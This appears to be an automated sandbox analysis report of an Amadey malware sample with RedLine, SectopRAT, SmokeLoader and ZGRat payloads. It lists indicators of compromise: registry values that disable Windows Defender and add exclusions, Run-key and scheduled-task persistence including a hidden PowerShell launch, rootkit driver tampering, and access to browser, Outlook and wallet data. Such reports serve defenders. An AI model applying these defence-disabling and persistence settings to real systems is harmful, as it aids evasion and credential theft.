amadey | 4aa3331d7e5de2ecc6e106fbd0bd710cbbf7a7a5b5ad608a7122912e9115df67

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	BB19.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	BB19.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	BB19.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	BB19.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	BB19.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 14 IoCs

resource	yara_rule
behavioral1/memory/476-105-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/476-106-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/476-114-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/476-150-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/memory/476-152-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral1/files/0x0007000000016cdd-186.dat	family_redline
behavioral1/files/0x0007000000016cdd-187.dat	family_redline
behavioral1/memory/816-188-0x0000000000A00000-0x0000000000A3E000-memory.dmp	family_redline
behavioral1/memory/2784-275-0x0000000000F90000-0x0000000000FCE000-memory.dmp	family_redline
behavioral1/memory/2444-303-0x0000000000480000-0x00000000004DA000-memory.dmp	family_redline
behavioral1/memory/2444-420-0x0000000000400000-0x0000000000480000-memory.dmp	family_redline
behavioral1/memory/2904-974-0x0000000000220000-0x000000000023E000-memory.dmp	family_redline
behavioral1/memory/2852-990-0x00000000002C0000-0x00000000002FE000-memory.dmp	family_redline
behavioral1/memory/2852-1008-0x0000000000400000-0x0000000000461000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/2904-974-0x0000000000220000-0x000000000023E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 2564 created 1208	2564	latestX.exe	15
PID 2564 created 1208	2564	latestX.exe	15
PID 2564 created 1208	2564	latestX.exe	15
PID 2564 created 1208	2564	latestX.exe	15
PID 2564 created 1208	2564	latestX.exe	15
PID 3112 created 1208	3112	updater.exe	15
PID 3112 created 1208	3112	updater.exe	15
PID 3112 created 1208	3112	updater.exe	15
PID 3112 created 1208	3112	updater.exe	15
PID 3112 created 1208	3112	updater.exe	15
PID 3112 created 1208	3112	updater.exe	15

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2036	bcdedit.exe
2112	bcdedit.exe
3912	bcdedit.exe
3876	bcdedit.exe
1560	bcdedit.exe
4000	bcdedit.exe
2624	bcdedit.exe
3744	bcdedit.exe
4040	bcdedit.exe
3460	bcdedit.exe
604	bcdedit.exe
3656	bcdedit.exe
4064	bcdedit.exe
2012	bcdedit.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
87	824	rundll32.exe
101	2832	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

pid	Process
3888	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Control Panel\International\Geo\Nation	4812.exe

Executes dropped EXE 54 IoCs

pid	Process
2308	vB4ma75.exe
2636	PK2UA89.exe
2792	wG3AO05.exe
2728	1jY48hG1.exe
2696	2aW4701.exe
3036	3Ri93ez.exe
2828	4sL423sr.exe
1956	9BA3.exe
1048	IN8gZ5gn.exe
2460	9C7F.exe
1228	xU8mT4YJ.exe
2260	Fb6jM0Il.exe
2128	5WY5TP7.exe
2148	nk2Rg5kr.exe
816	BA2E.exe
2428	BB19.exe
1784	1dI10GX0.exe
1052	explothe.exe
1576	CAD3.exe
2784	2iI657iQ.exe
2444	D30E.exe
372	F84B.exe
1280	1695.exe
1724	InstallSetup5.exe
1340	toolspub2.exe
1616	31839b57a4f11171d6abc8bbc4451ee4.exe
2708	kos4.exe
3056	22D5.exe
3048	toolspub2.exe
2564	latestX.exe
2384	Broom.exe
948	4812.exe
2904	4A83.exe
2852	4D04.exe
2032	5E15.exe
372	Utsysc.exe
1980	amers.exe
1712	Znhguqzxljx.png
868	Utsysc.exe
3056	explothe.exe
3296	31839b57a4f11171d6abc8bbc4451ee4.exe
4012	csrss.exe
3112	updater.exe
2548	injector.exe
3384	explothe.exe
3376	Utsysc.exe
1792	patch.exe
3512	amers.exe
4084	Utsysc.exe
4088	explothe.exe
3136	dsefix.exe
2020	windefender.exe
2420	windefender.exe
1760	Utsysc.exe

Loads dropped DLL 64 IoCs

pid	Process
1564	DW2sa51.exe
2308	vB4ma75.exe
2308	vB4ma75.exe
2636	PK2UA89.exe
2636	PK2UA89.exe
2792	wG3AO05.exe
2792	wG3AO05.exe
2792	wG3AO05.exe
2728	1jY48hG1.exe
2792	wG3AO05.exe
2792	wG3AO05.exe
2696	2aW4701.exe
2636	PK2UA89.exe
2636	PK2UA89.exe
3036	3Ri93ez.exe
2308	vB4ma75.exe
2308	vB4ma75.exe
2828	4sL423sr.exe
1956	9BA3.exe
1956	9BA3.exe
1048	IN8gZ5gn.exe
1048	IN8gZ5gn.exe
1228	xU8mT4YJ.exe
1228	xU8mT4YJ.exe
2260	Fb6jM0Il.exe
1564	DW2sa51.exe
2128	5WY5TP7.exe
2260	Fb6jM0Il.exe
2148	nk2Rg5kr.exe
2148	nk2Rg5kr.exe
2148	nk2Rg5kr.exe
1784	1dI10GX0.exe
2128	5WY5TP7.exe
1052	explothe.exe
2148	nk2Rg5kr.exe
2784	2iI657iQ.exe
372	F84B.exe
372	F84B.exe
372	F84B.exe
372	F84B.exe
372	F84B.exe
372	F84B.exe
1340	toolspub2.exe
372	F84B.exe
1724	InstallSetup5.exe
2032	5E15.exe
3056	22D5.exe
2544	rundll32.exe
2544	rundll32.exe
2544	rundll32.exe
2544	rundll32.exe
824	rundll32.exe
824	rundll32.exe
824	rundll32.exe
824	rundll32.exe
1020	rundll32.exe
1020	rundll32.exe
1020	rundll32.exe
1020	rundll32.exe
2832	rundll32.exe
2832	rundll32.exe
2832	rundll32.exe
2832	rundll32.exe
372	Utsysc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	BB19.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	31839b57a4f11171d6abc8bbc4451ee4.exe

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe
Key opened	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	4812.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DW2sa51.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	vB4ma75.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	wG3AO05.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	IN8gZ5gn.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	nk2Rg5kr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	PK2UA89.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	9BA3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	xU8mT4YJ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	Fb6jM0Il.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\1695.exe'\""	1695.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
55	api.ipify.org
56	api.ipify.org
58	api.ipify.org

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 2728 set thread context of 2644	2728	1jY48hG1.exe	32
PID 2696 set thread context of 2580	2696	2aW4701.exe	34
PID 2828 set thread context of 476	2828	4sL423sr.exe	38
PID 1784 set thread context of 1336	1784	1dI10GX0.exe	60
PID 1340 set thread context of 3048	1340	toolspub2.exe	85
PID 3056 set thread context of 1520	3056	22D5.exe	131
PID 1980 set thread context of 3512	1980	amers.exe	192
PID 3112 set thread context of 1608	3112	updater.exe	193
PID 3112 set thread context of 3928	3112	updater.exe	195

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20231101054025.cab	makecab.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3424	sc.exe
2776	sc.exe
3468	sc.exe
2640	sc.exe
3524	sc.exe
3548	sc.exe
3572	sc.exe
1764	sc.exe
3536	sc.exe
3560	sc.exe
2688	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
928	2580	WerFault.exe	34
2760	1336	WerFault.exe	60

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Ri93ez.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Ri93ez.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3Ri93ez.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3192	schtasks.exe
2056	schtasks.exe
2480	schtasks.exe
3792	schtasks.exe
3224	schtasks.exe
2748	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 29 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0EDD4C41-7879-11EE-9061-7E017AD50F09} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404979061"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
